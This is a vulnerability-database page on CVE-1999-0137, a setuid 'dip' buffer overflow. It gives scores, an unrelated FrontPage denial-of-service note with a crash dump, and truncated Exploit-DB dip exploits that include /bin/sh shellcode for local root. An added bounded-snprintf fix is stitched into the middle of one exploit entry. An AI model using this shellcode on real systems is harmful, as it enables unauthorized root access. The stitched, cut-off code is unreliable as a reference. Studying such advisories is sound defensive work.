CVE-1999-0137
Published 1996-07-09
CVE-1999-0137: The dip program on many Linux systems allows local users to gain root access via a buffer overflow.
Priority: P425 | high | 7.2 (CVSS 2.0)
CVSS vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 0.86% (53.9th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fred_n_van_kempen | dip | — | — |
No detection rules found.
Exploit-DB
Microsoft FrontPage Personal Web Server 1.0 - PWS Denial of Service
exploitdb·1999-08-08
CVE-1999-0681 Microsoft FrontPage Personal Web Server 1.0 - PWS Denial of Service
---
source: https://www.securityfocus.com/bid/568/info
A 'GET' request for a URL longer than 166 characters will overflow a buffer and cause the web server to crash with the following or similar error message:
VHTTPD32 caused an invalid page fault in
module VHTTPD32.EXE at 0137:0040aaed.
Registers:
EAX=010d7740 CS=0137 EIP=0040aaed EFLGS=00010202
EBX=00000000 SS=013f ESP=010d53d0 EBP=010d0074
ECX=010d7740 DS=013f ESI=010d7740 FS=13c7
EDX=000000a8 ES=013f EDI=bff92ac1 GS=0000
Bytes at CS:EIP:
ff 75 10 56 68 94 01 00 00 eb 1c 68 00 24 40 00
Stack dump:
00000010 010d7740 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000
00000000
https://gitlab.com/exploi
Exploit-DB
Fred N. van Kempen dip 3.3.7 - Local Buffer Overflow (1)
exploitdb·1998-05-05
CVE-1999-0137 Fred N. van Kempen dip 3.3.7 - Local Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/86/info
A buffer overflow resides in 'dip-3.3.7o' and derived programs. This is a problem only on systems where 'dip' is installed setuid. The culpable code is an 'sprintf()' in line 192 in 'main.c':
sprintf(buf, "%s/LCK..%s", _PATH_LOCKD, nam);
----- dip-exp.c -----
/*
dip 3.3.7o buffer overflow exploit for Linux. (May 7, 1998)
coded by jamez. e-mail: [email protected]
thanks to all ppl from uground.
usage:
gcc -o dip-exp dip3.3.7o-exp.c
./dip-exp offset (-100 to 100. probably 0. tested on slack 3.4)
*/
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xf
Exploit-DB
Fred N. van Kempen dip 3.3.7 - Local Buffer Overflow (2)
exploitdb·1998-05-05
CVE-1999-0137 Fred N. van Kempen dip 3.3.7 - Local Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/86/info
A buffer overflow resides in 'dip-3.3.7o' and derived programs. This is a problem only on systems where 'dip' is installed setuid. The culpable code is an 'sprintf()' in line 192 in 'main.c':
sprintf(buf, "%s/LCK..%s", _PATH_LOCKD, nam);
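The `sprintf()` call quoted above, rewritten with a length check, as an added example that is not code from dip or from the advisory. The value of `_PATH_LOCKD` (`/var/lock`), the buffer size (128) and the helper names `lock_path_need` and `make_lock_path` are assumptions; the page gives none of them.

```c
#include <stdio.h>
#include <string.h>

#define PATH_LOCKD "/var/lock"   /* assumed value of _PATH_LOCKD */
#define LOCK_BUF   128           /* assumed size of buf; the page does not give it */

/* Bytes (including the NUL) that the page's
 *   sprintf(buf, "%s/LCK..%s", _PATH_LOCKD, nam);
 * would write. snprintf(NULL, 0, ...) only measures, it writes nothing. */
static size_t lock_path_need(const char *nam)
{
    int n = snprintf(NULL, 0, "%s/LCK..%s", PATH_LOCKD, nam);
    return n < 0 ? 0 : (size_t)n + 1;
}

/* Bounded replacement: 0 on success, -1 if the name is missing or the
 * result would not fit. Truncation is treated as an error rather than
 * accepted, so a shortened lock path is never used. */
static int make_lock_path(char *buf, size_t buflen, const char *nam)
{
    int n;

    if (buf == NULL || buflen == 0 || nam == NULL || *nam == '\0')
        return -1;
    n = snprintf(buf, buflen, "%s/LCK..%s", PATH_LOCKD, nam);
    if (n < 0 || (size_t)n >= buflen) {
        buf[0] = '\0';
        return -1;
    }
    return 0;
}

int main(void)
{
    char buf[LOCK_BUF];
    char longnam[512];               /* constructed oversized input */

    memset(longnam, 'A', sizeof longnam - 1);
    longnam[sizeof longnam - 1] = '\0';

    printf("ttyS0: rc=%d path=%s\n", make_lock_path(buf, sizeof buf, "ttyS0"), buf);
    printf("511-byte name needs %zu bytes, buf holds %d, rc=%d\n",
           lock_path_need(longnam), LOCK_BUF,
           make_lock_path(buf, sizeof buf, longnam));
    return 0;
}
```

Because dip is only a problem when installed setuid, the check has to run on every caller-supplied name before the path is used, with the failure return handled by aborting rather than continuing.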
/* Linux x86 dip 3.3.7p exploit by pr10n */
#include
#define NOP 0x90
/*thanks to hack.co.za*/
char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d"
"\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3"
"\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
"\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";
unsigned long get_sp(void){ __asm__("movl %esp, %eax");}
main(int argc, char *argv[]){
char buf[136];
int i;
int off
No writeups or analysis indexed.